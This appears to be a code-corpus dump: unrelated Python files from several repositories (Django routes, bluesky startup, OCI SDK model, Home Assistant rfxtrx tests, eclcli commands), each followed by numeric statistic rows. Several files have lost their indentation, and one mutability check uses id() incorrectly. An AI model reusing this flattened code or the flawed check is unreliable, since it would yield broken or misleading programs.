# === File: Course2/snippets/C2M5.py (repo: KaramSahoo/it-cert-automation, license: Apache-2.0) ===
#!/usr/bin/env python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are the snippets shown during the demo videos in C2M5
# Each snippet is followed by the corresponding output when executed in the
# Python interpreter.
# >>> from rearrange import rearrange_name
#
# >>> rearrange_name("Lovelace, Ada")
# 'Ada Lovelace'
#
# >>> from validations import validate_user
# >>> validate_user("", -1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/user/validations.py", line 5, in validate_user
# raise ValueError("minlen must be at least 1")
# ValueError: minlen must be at least 1
#
# >>> validate_user("", 1)
# False
# >>> validate_user("myuser", 1)
# True
#
# >>> validate_user(88, 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/user/validations.py", line 7, in validate_user
# if len(username) < minlen:
# TypeError: object of type 'int' has no len()
#
# >>> validate_user([], 1)
# False
#
# >>> validate_user(["name"], 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/marga/validations.py", line 9, in validate_user
# if not username.isalnum():
# AttributeError: 'list' object has no attribute 'isalnum'
#
#
# >>> from validations import validate_user
#
# >>> validate_user([3], 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/marga/validations.py", line 4, in validate_user
# assert type(username) == str, "username must be a string"
# AssertionError: username must be a string
| 32.830769 | 75 | 0.693533 | 305 | 2,134 | 4.803279 | 0.44918 | 0.106485 | 0.038225 | 0.054608 | 0.389079 | 0.36041 | 0.319454 | 0.217065 | 0.217065 | 0.217065 | 0 | 0.017684 | 0.178538 | 2,134 | 64 | 76 | 33.34375 | 0.818026 | 0.941425 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
# === File: image/urls.py (repo: naritotakizawa/kemono, license: MIT) ===
from django.conf.urls import url
from django.contrib import admin
from image import views
urlpatterns = [
url(r'^$', views.ImageList.as_view(), name='list'),
url(r'^create/$', views.ImageForm.as_view(), name='create'),
]
# === File: startup/00-base.py (repo: NSLS-II-AMX/profile_collection, license: BSD-3-Clause) ===
import os
import matplotlib
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'widget') # i.e. %matplotlib widget
import matplotlib.pyplot
from ophyd import Device, Component, EpicsSignal
from ophyd.signal import EpicsSignalBase
from ophyd.areadetector.filestore_mixins import resource_factory
import uuid
from pathlib import Path
import numpy as np
# Set up a RunEngine and use metadata backed by a sqlite file.
from bluesky import RunEngine
from bluesky.utils import get_history
RE = RunEngine(get_history())
# Set up SupplementalData.
from bluesky import SupplementalData
sd = SupplementalData()
RE.preprocessors.append(sd)
# Set up a Broker.
from databroker import Broker
db = Broker.named('amx')
# and subscribe it to the RunEngine
RE.subscribe(db.insert)
# Add a progress bar.
# from bluesky.utils import ProgressBarManager
# pbar_manager = ProgressBarManager()
# RE.waiting_hook = pbar_manager
# Register bluesky IPython magics.
from bluesky.magics import BlueskyMagics
get_ipython().register_magics(BlueskyMagics)
# Set up the BestEffortCallback.
from bluesky.callbacks.best_effort import BestEffortCallback
bec = BestEffortCallback()
RE.subscribe(bec)
peaks = bec.peaks
# Import matplotlib and put it in interactive mode.
import matplotlib.pyplot as plt
plt.ion()
# Make plots update live while scans run.
from bluesky.utils import install_nb_kicker
install_nb_kicker()
# convenience imports
# some of the * imports are for 'back-compatibility' of a sort -- we have
# taught BL staff to expect LiveTable and LivePlot etc. to be in their
# namespace
import numpy as np
import bluesky.plans as bp
import bluesky.plan_stubs as bps
import bluesky.preprocessors as bpp
#Optional: set any metadata that rarely changes.
RE.md['beamline_id'] = 'AMX'
# === File: tools/id-post-amino.py (repo: FrisKal/amino-bot_and_tools, license: MIT) ===
import amino
client = amino.Client()
client.login(email='your mail', password='your password')
sub_client = amino.SubClient(comId='id of your community', profile=client.profile)
user_blogs = sub_client.get_user_blogs('your account id')  # fetch once, reuse below
for title, blogId in zip(user_blogs.title, user_blogs.blogId):
    print(title, blogId)
# === File: python/plotting/cdf.py (repo: jdurbin/sandbox, license: MIT) ===
#!/usr/bin/env python3
import matplotlib
import matplotlib.pyplot as plt
from collections import defaultdict
import numpy as np
lengths = defaultdict(list)
lib_count = defaultdict(int)
lib="good"
lengths[lib].append(20)
lengths[lib].append(30)
lengths[lib].append(100)
lengths[lib].append(330)
lengths[lib].append(10)
lengths[lib].append(40)
lengths[lib].append(45)
lengths[lib].append(60)
lengths[lib].append(22)
lengths[lib].append(10)
lib_count[lib]+=10
lib="good"
lengths[lib].append(21)
lengths[lib].append(33)
lengths[lib].append(109)
lengths[lib].append(320)
lengths[lib].append(14)
lengths[lib].append(32)
lengths[lib].append(33)
lengths[lib].append(51)
lengths[lib].append(72)
lengths[lib].append(60)
lib_count[lib]+=10
lib="bad"
lengths[lib].append(12)
lengths[lib].append(13)
lengths[lib].append(24)
lengths[lib].append(300)
lengths[lib].append(7)
lengths[lib].append(35)
lengths[lib].append(25)
lengths[lib].append(45)
lengths[lib].append(19)
lengths[lib].append(8)
lib_count[lib]+=10
libs = sorted(lengths.keys())
print(libs)
for lib in libs:
lengths[lib] = np.array(lengths[lib])
lens = lengths[lib][lengths[lib] != 0]
length_cdf = np.linspace(0, 1, len(lens))
plt.plot(sorted(lens), length_cdf, "-")
plt.xscale("log")
plt.ylabel("Fraction of aligned fragments")
plt.xlabel("Pair size")
plt.title("Cumulative distribution (cis-chromosomal pairs only)")
plt.grid(linewidth=0.25)
plt.show()
#plt.savefig(f"{args.output_prefix}_size_cdf_cisonly.{args.output_image_format}")
plt.close()
| 21.957143 | 81 | 0.732596 | 244 | 1,537 | 4.565574 | 0.377049 | 0.305206 | 0.43088 | 0.035009 | 0.189408 | 0.122083 | 0.122083 | 0 | 0 | 0 | 0 | 0.054286 | 0.089135 | 1,537 | 69 | 82 | 22.275362 | 0.741429 | 0.065712 | 0 | 0.232143 | 0 | 0 | 0.073222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.017857 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
# === File: src/oci/operator_access_control/models/operator_control_assignment_summary.py (repo: Manny27nyc/oci-python-sdk, licenses: Apache-2.0, BSD-3-Clause) ===
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class OperatorControlAssignmentSummary(object):
"""
Details of the operator control assignment.
"""
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "CREATED"
LIFECYCLE_STATE_CREATED = "CREATED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "APPLIED"
LIFECYCLE_STATE_APPLIED = "APPLIED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "APPLYFAILED"
LIFECYCLE_STATE_APPLYFAILED = "APPLYFAILED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
def __init__(self, **kwargs):
"""
Initializes a new OperatorControlAssignmentSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param id:
The value to assign to the id property of this OperatorControlAssignmentSummary.
:type id: str
:param operator_control_id:
The value to assign to the operator_control_id property of this OperatorControlAssignmentSummary.
:type operator_control_id: str
:param resource_id:
The value to assign to the resource_id property of this OperatorControlAssignmentSummary.
:type resource_id: str
:param resource_type:
The value to assign to the resource_type property of this OperatorControlAssignmentSummary.
:type resource_type: str
:param compartment_id:
The value to assign to the compartment_id property of this OperatorControlAssignmentSummary.
:type compartment_id: str
:param time_assignment_from:
The value to assign to the time_assignment_from property of this OperatorControlAssignmentSummary.
:type time_assignment_from: datetime
:param time_assignment_to:
The value to assign to the time_assignment_to property of this OperatorControlAssignmentSummary.
:type time_assignment_to: datetime
:param is_enforced_always:
The value to assign to the is_enforced_always property of this OperatorControlAssignmentSummary.
:type is_enforced_always: bool
:param time_of_assignment:
The value to assign to the time_of_assignment property of this OperatorControlAssignmentSummary.
:type time_of_assignment: datetime
:param lifecycle_state:
The value to assign to the lifecycle_state property of this OperatorControlAssignmentSummary.
Allowed values for this property are: "CREATED", "APPLIED", "APPLYFAILED", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type lifecycle_state: str
:param freeform_tags:
The value to assign to the freeform_tags property of this OperatorControlAssignmentSummary.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this OperatorControlAssignmentSummary.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'id': 'str',
'operator_control_id': 'str',
'resource_id': 'str',
'resource_type': 'str',
'compartment_id': 'str',
'time_assignment_from': 'datetime',
'time_assignment_to': 'datetime',
'is_enforced_always': 'bool',
'time_of_assignment': 'datetime',
'lifecycle_state': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'id': 'id',
'operator_control_id': 'operatorControlId',
'resource_id': 'resourceId',
'resource_type': 'resourceType',
'compartment_id': 'compartmentId',
'time_assignment_from': 'timeAssignmentFrom',
'time_assignment_to': 'timeAssignmentTo',
'is_enforced_always': 'isEnforcedAlways',
'time_of_assignment': 'timeOfAssignment',
'lifecycle_state': 'lifecycleState',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._id = None
self._operator_control_id = None
self._resource_id = None
self._resource_type = None
self._compartment_id = None
self._time_assignment_from = None
self._time_assignment_to = None
self._is_enforced_always = None
self._time_of_assignment = None
self._lifecycle_state = None
self._freeform_tags = None
self._defined_tags = None
@property
def id(self):
"""
**[Required]** Gets the id of this OperatorControlAssignmentSummary.
The OCID of the operator control assignment.
:return: The id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this OperatorControlAssignmentSummary.
The OCID of the operator control assignment.
:param id: The id of this OperatorControlAssignmentSummary.
:type: str
"""
self._id = id
@property
def operator_control_id(self):
"""
**[Required]** Gets the operator_control_id of this OperatorControlAssignmentSummary.
The OCID of the operator control.
:return: The operator_control_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._operator_control_id
@operator_control_id.setter
def operator_control_id(self, operator_control_id):
"""
Sets the operator_control_id of this OperatorControlAssignmentSummary.
The OCID of the operator control.
:param operator_control_id: The operator_control_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._operator_control_id = operator_control_id
@property
def resource_id(self):
"""
**[Required]** Gets the resource_id of this OperatorControlAssignmentSummary.
The OCID of the target resource being governed by the operator control.
:return: The resource_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._resource_id
@resource_id.setter
def resource_id(self, resource_id):
"""
Sets the resource_id of this OperatorControlAssignmentSummary.
The OCID of the target resource being governed by the operator control.
:param resource_id: The resource_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._resource_id = resource_id
@property
def resource_type(self):
"""
Gets the resource_type of this OperatorControlAssignmentSummary.
Type of the target resource being governed by the operator control.
:return: The resource_type of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._resource_type
@resource_type.setter
def resource_type(self, resource_type):
"""
Sets the resource_type of this OperatorControlAssignmentSummary.
Type of the target resource being governed by the operator control.
:param resource_type: The resource_type of this OperatorControlAssignmentSummary.
:type: str
"""
self._resource_type = resource_type
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this OperatorControlAssignmentSummary.
The OCID of the compartment that contains the operator control assignment.
:return: The compartment_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this OperatorControlAssignmentSummary.
The OCID of the compartment that contains the operator control assignment.
:param compartment_id: The compartment_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._compartment_id = compartment_id
@property
def time_assignment_from(self):
"""
Gets the time_assignment_from of this OperatorControlAssignmentSummary.
The time at which the target resource will be brought under the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:return: The time_assignment_from of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_assignment_from
@time_assignment_from.setter
def time_assignment_from(self, time_assignment_from):
"""
Sets the time_assignment_from of this OperatorControlAssignmentSummary.
The time at which the target resource will be brought under the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_assignment_from: The time_assignment_from of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_assignment_from = time_assignment_from
@property
def time_assignment_to(self):
"""
Gets the time_assignment_to of this OperatorControlAssignmentSummary.
        The time at which the target resource will leave the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:return: The time_assignment_to of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_assignment_to
@time_assignment_to.setter
def time_assignment_to(self, time_assignment_to):
"""
Sets the time_assignment_to of this OperatorControlAssignmentSummary.
        The time at which the target resource will leave the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_assignment_to: The time_assignment_to of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_assignment_to = time_assignment_to
@property
def is_enforced_always(self):
"""
Gets the is_enforced_always of this OperatorControlAssignmentSummary.
If true, then the target resource is always governed by the operator control. Otherwise governance is time-based as specified by timeAssignmentTo and timeAssignmentFrom.
:return: The is_enforced_always of this OperatorControlAssignmentSummary.
:rtype: bool
"""
return self._is_enforced_always
@is_enforced_always.setter
def is_enforced_always(self, is_enforced_always):
"""
Sets the is_enforced_always of this OperatorControlAssignmentSummary.
If true, then the target resource is always governed by the operator control. Otherwise governance is time-based as specified by timeAssignmentTo and timeAssignmentFrom.
:param is_enforced_always: The is_enforced_always of this OperatorControlAssignmentSummary.
:type: bool
"""
self._is_enforced_always = is_enforced_always
@property
def time_of_assignment(self):
"""
Gets the time_of_assignment of this OperatorControlAssignmentSummary.
Time when the operator control assignment is created in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_assignment of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_of_assignment
@time_of_assignment.setter
def time_of_assignment(self, time_of_assignment):
"""
Sets the time_of_assignment of this OperatorControlAssignmentSummary.
Time when the operator control assignment is created in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_of_assignment: The time_of_assignment of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_of_assignment = time_of_assignment
@property
def lifecycle_state(self):
"""
Gets the lifecycle_state of this OperatorControlAssignmentSummary.
        The current lifecycle state of the OperatorControl.
Allowed values for this property are: "CREATED", "APPLIED", "APPLYFAILED", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The lifecycle_state of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this OperatorControlAssignmentSummary.
        The current lifecycle state of the OperatorControl.
:param lifecycle_state: The lifecycle_state of this OperatorControlAssignmentSummary.
:type: str
"""
allowed_values = ["CREATED", "APPLIED", "APPLYFAILED", "DELETED"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
lifecycle_state = 'UNKNOWN_ENUM_VALUE'
self._lifecycle_state = lifecycle_state
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this OperatorControlAssignmentSummary.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
:return: The freeform_tags of this OperatorControlAssignmentSummary.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this OperatorControlAssignmentSummary.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
:param freeform_tags: The freeform_tags of this OperatorControlAssignmentSummary.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this OperatorControlAssignmentSummary.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
:return: The defined_tags of this OperatorControlAssignmentSummary.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this OperatorControlAssignmentSummary.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
:param defined_tags: The defined_tags of this OperatorControlAssignmentSummary.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 37.220982 | 245 | 0.688096 | 1,884 | 16,675 | 5.865711 | 0.105626 | 0.033119 | 0.206316 | 0.095014 | 0.742467 | 0.653244 | 0.587458 | 0.45652 | 0.398154 | 0.384581 | 0 | 0.013395 | 0.247856 | 16,675 | 447 | 246 | 37.304251 | 0.867724 | 0.593823 | 0 | 0.090909 | 0 | 0 | 0.128977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212121 | false | 0 | 0.015152 | 0.015152 | 0.386364 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b965c7d52ff43c31b25341fac7a3a921be2cf8b7 | 230 | py | Python | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | class Foo:
num1 : int
num2 : int
foo1 = Foo()
id_foo1_before = id(foo1)
foo1.num1 = 1
id_foo1_after = id(foo1)
# NOTE: id() reflects object identity, not immutability; setting an attribute
# never changes the instance's id, so this check always takes the first branch
# even though Foo instances are in fact mutable.
if id_foo1_before == id_foo1_after:
    print('Foo is immutable')
else:
    print('Foo is mutable')
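# A hedged companion sketch (illustrative only; relies on the same CPython
# id() semantics as the check above): in-place mutation keeps an object's
# identity, while rebinding a name to a new object does not.
nums = [1, 2]
id_nums_before = id(nums)
nums.append(3)                      # mutate in place
assert id(nums) == id_nums_before   # same object: lists are mutable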
| 15.333333 | 35 | 0.634783 | 37 | 230 | 3.72973 | 0.432432 | 0.26087 | 0.173913 | 0.202899 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 0.252174 | 230 | 14 | 36 | 16.428571 | 0.732558 | 0 | 0 | 0 | 0 | 0 | 0.131004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.272727 | 0.181818 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b96dec95e6e6bb7a13ec07cf4301f991e5cb3254 | 6,071 | py | Python | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | null | null | null | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | 36 | 2020-08-03T07:31:17.000Z | 2022-03-31T06:02:05.000Z | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | null | null | null | """The tests for the Rfxtrx light platform."""
from unittest.mock import call
import pytest
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from . import _signal_event
from tests.common import mock_restore_cache
async def test_one_light(hass, rfxtrx):
"""Test with 1 light."""
assert await async_setup_component(
hass,
"rfxtrx",
{"rfxtrx": {"device": "abcd", "devices": {"0b1100cd0213c7f210020f51": {}}}},
)
await hass.async_block_till_done()
state = hass.states.get("light.ac_213c7f2_16")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 213c7f2:16"
await hass.services.async_call(
"light", "turn_on", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 255
await hass.services.async_call(
"light", "turn_off", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "off"
assert state.attributes.get("brightness") is None
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 100},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 100
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 10},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 10
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 255},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 255
await hass.services.async_call(
"light", "turn_off", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "off"
assert state.attributes.get("brightness") is None
assert rfxtrx.transport.send.mock_calls == [
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x01\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x00\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x06\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x0f\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x00\x00\x00")),
]
@pytest.mark.parametrize("state,brightness", [["on", 100], ["on", 50], ["off", None]])
async def test_state_restore(hass, rfxtrx, state, brightness):
"""State restoration."""
entity_id = "light.ac_213c7f2_16"
mock_restore_cache(
hass, [State(entity_id, state, attributes={ATTR_BRIGHTNESS: brightness})]
)
assert await async_setup_component(
hass,
"rfxtrx",
{"rfxtrx": {"device": "abcd", "devices": {"0b1100cd0213c7f210020f51": {}}}},
)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == state
assert hass.states.get(entity_id).attributes.get(ATTR_BRIGHTNESS) == brightness
async def test_several_lights(hass, rfxtrx):
"""Test with 3 lights."""
assert await async_setup_component(
hass,
"rfxtrx",
{
"rfxtrx": {
"device": "abcd",
"devices": {
"0b1100cd0213c7f230020f71": {},
"0b1100100118cdea02020f70": {},
"0b1100101118cdea02050f70": {},
},
}
},
)
await hass.async_block_till_done()
state = hass.states.get("light.ac_213c7f2_48")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 213c7f2:48"
state = hass.states.get("light.ac_118cdea_2")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 118cdea:2"
state = hass.states.get("light.ac_1118cdea_2")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 1118cdea:2"
@pytest.mark.parametrize("repetitions", [1, 3])
async def test_repetitions(hass, rfxtrx, repetitions):
"""Test signal repetitions."""
assert await async_setup_component(
hass,
"rfxtrx",
{
"rfxtrx": {
"device": "abcd",
"devices": {
"0b1100cd0213c7f230020f71": {"signal_repetitions": repetitions}
},
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
"light", "turn_on", {"entity_id": "light.ac_213c7f2_48"}, blocking=True
)
await hass.async_block_till_done()
assert rfxtrx.transport.send.call_count == repetitions
async def test_discover_light(hass, rfxtrx):
"""Test with discovery of lights."""
assert await async_setup_component(
hass, "rfxtrx", {"rfxtrx": {"device": "abcd", "automatic_add": True}},
)
await hass.async_block_till_done()
await hass.async_start()
await _signal_event(hass, "0b11009e00e6116202020070")
state = hass.states.get("light.ac_0e61162_2")
assert state
assert state.state == "on"
assert state.attributes.get("friendly_name") == "AC 0e61162:2"
await _signal_event(hass, "0b1100120118cdea02020070")
state = hass.states.get("light.ac_118cdea_2")
assert state
assert state.state == "on"
assert state.attributes.get("friendly_name") == "AC 118cdea:2"
| 32.121693 | 86 | 0.633998 | 738 | 6,071 | 5.042005 | 0.139566 | 0.088686 | 0.060199 | 0.060199 | 0.72588 | 0.713518 | 0.680731 | 0.6681 | 0.651169 | 0.646869 | 0 | 0.098669 | 0.220392 | 6,071 | 188 | 87 | 32.292553 | 0.687513 | 0.006589 | 0 | 0.536913 | 0 | 0.040268 | 0.251784 | 0.081549 | 0 | 0 | 0 | 0 | 0.261745 | 1 | 0 | false | 0 | 0.04698 | 0 | 0.04698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9ac8d933a862f6486659d3e03d472b18cbd344c | 5,850 | py | Python | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 32 | 2016-08-31T04:12:40.000Z | 2020-12-11T04:49:57.000Z | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 27 | 2016-09-06T07:50:36.000Z | 2021-09-14T09:46:03.000Z | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 24 | 2016-09-02T01:09:09.000Z | 2021-01-19T09:14:16.000Z |
import six
from eclcli.common import command
from eclcli.common import exceptions
from eclcli.common import utils
from ..interconnectivityclient.common.utils import objectify, get_request_body
class ListCIC(command.Lister):
def get_parser(self, prog_name):
parser = super(ListCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="id of mcic to list CIC (ID)")
return parser
def take_action(self, parsed_args):
connectivity_client = self.app.client_manager.interconnectivity
columns = (
'cic_id',
'cic_name',
'cic_status',
)
column_headers = (
'ID',
'Name',
'Status',
)
data = [objectify(cic)
for cic in connectivity_client.list_cics(parsed_args.mcic_id)]
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in data))
class ShowCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(ShowCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="mcic to display (ID)")
parser.add_argument(
"--cic_id",
metavar="<cic_id>",
required=True,
help="cic to display (ID)")
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
try:
cic = ecc_client.show_cic(parsed_args.mcic_id, parsed_args.cic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class CreateCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(CreateCIC, self).get_parser(prog_name)
parser.add_argument(
